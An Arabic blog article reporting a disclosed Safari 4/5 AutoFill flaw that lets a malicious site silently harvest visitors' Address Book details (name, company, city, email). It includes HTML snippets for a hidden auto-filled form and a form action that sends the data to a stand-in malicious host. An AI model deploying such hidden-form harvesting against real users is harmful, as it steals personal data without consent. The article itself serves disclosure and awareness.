الكشف عن ثغرة في متصفح Safari تعرض بيانات المستخدم للسرقة

الوقت المقدّر لقراءة هذا المقال: 4 دقيقة و 7 ثانية

الكشف عن ثغرة في متصفح Safari تعرض بيانات المستخدم للسرقة

تم الإعلان عن وجود خلل أمني في التصميم في متصفح Safari للإصدارين 4.0 و 5.0 يسمح للمهاجم بالحصول على بيانات شخصية خاصة بالزائر مثل (الاسم، العنوان،البريد الالكتروني، …)

المشكلة الأمنية تظهر في حال قيام مستخدم ما بزيارة موقع خبيث، حتى لو لم يزره من قبل، ولم يدخل أي بيانات شخصية أيضاً، فيكون بمقدور الموقع كشف اسمه الكامل، مكان العمل، المدينة، الولاية (في حال كونه في الولايات المتحدة) بريده الالكتروني الشخصي!

يأتي متصفح Safari في الإصدارين 4.0 و 5.0 والذي يملك حوالي 4% من حصة السوق (أي تقريباً 83 مليون مستخدم)، بميزة على المسار (Preferences > AutoFill > AutoFill web forms) مفعّلة بشكل افتراضي.

هذه الميزة “AutoFill” تقوم بملء حقول الإدخال النصية في صفحات HTML والتي تحمل خصائص معينة مثل name, company, city, state, country, email, الخ.

مثال:

<form>
<input name="company" type="text" />
<input name="email" type="text" /></form>

يتم ملء هذه الحقول باستخدام بيانات من سجل المستخدمين الخاص في دفتر العناوين الخاص بنظام التشغيل المستخدم ومن المهم التذكير بأن هذه الخاصة تعمل حتى لو لم يقم المستخدم بإدخال مثل هذه البيانات من قبل لأنها مختلفة عن ميزة الإكمال التلقائي والتي يقوم المتصفح بتذكر بعض ما قمت بإدخاله مؤخراً في بعض حقول الإدخال النصية في المواقع التي تستخدمها.

كل ما يحتاج إلى القيام به أي موقع خبيث لاستخراج هذه المعلومات بمعاونة متصفح Safari هو أن يقوم بإنشاء نموذج (Form) إدخال كالمثال الذي ذكرناه، حتى لو بشكل مخفي، ومن ثم “محاكاة” نقرات المفاتيح ضمنها لإيهام المتصفح بأن المستخدم هو من يقوم بالنقر على لوحة المفاتيح. عندما يتم جلب البيانات والتي يتم ملؤها بشكل آلي، يصبح بإمكان المهاجم الوصول إليها من خلال إرسالها دون علم المستخدم إلى العنوان الذي يحدده في النموذج

<form action="http://www.malicious-storage-URL.com"></form>

قام Robert Hansen المعروف بـ “RSnake” أحد الخبراء المعروفين في عالم الأمن (والذي بالتأكيد قرأتم شيئاً من كتاباته في موقع http://ha.ckers.org) باستضافة دليل proof-of-concept على وجود المشكلة – لو كنت تود التجربة والإطلاع وتقلق بشأن بياناتك تستطيع تغييرها قبل زيارة الموقع من خلال Address Book كما تظهر الصورة

وفقاً لما تذكره مدونة Jeremiah Grossman أحد الأسماء المعروفة أيضاً في عالم أمن المعلومات فإنه من حسن الحظ أن أرقام الهاتف “لسبب ما” لا يتم إظهارها بهذه الطريقة.

قمت بتجربة الدليل المنشور على موقع RSnake وفيما يلي صورة للنتائج

تجدر الإشارة إلى أن Jeremiah Grossman قد قام بإبلاغ Apple حول المشكل لكن لم يتلق سوى رد آلي على رسالته، و بعد عدم الحصول على أي رد على مراسلة ثانية قرر الكشف عن الثغرة ليسمع صوته بشكل أفضل 🙂

للإطلاع على المزيد من المعلومات حول الخبر يمكن مراجعة التدوينة الأصلية.


هل أعجبك هذا المقال؟ أخبر أصدقاءك عنه Share on Facebook0Tweet about this on TwitterShare on Google+0Share on LinkedIn0Buffer this pageEmail this to someoneShare on Reddit0Share on Tumblr0

عن كاتب المقال:

من محاربي الأسمبلي القدامى. أتقن البرمجة بالعديد من اللغات بما يتناسب مع طبيعة المشاريع التي أعمل عليها. مهتم بالنواحي الأمنية للتطبيقات المكتبية، تطبيقات الويب وأمن الشبكات والأنظمة. الرمادي هو لوني المفضّل.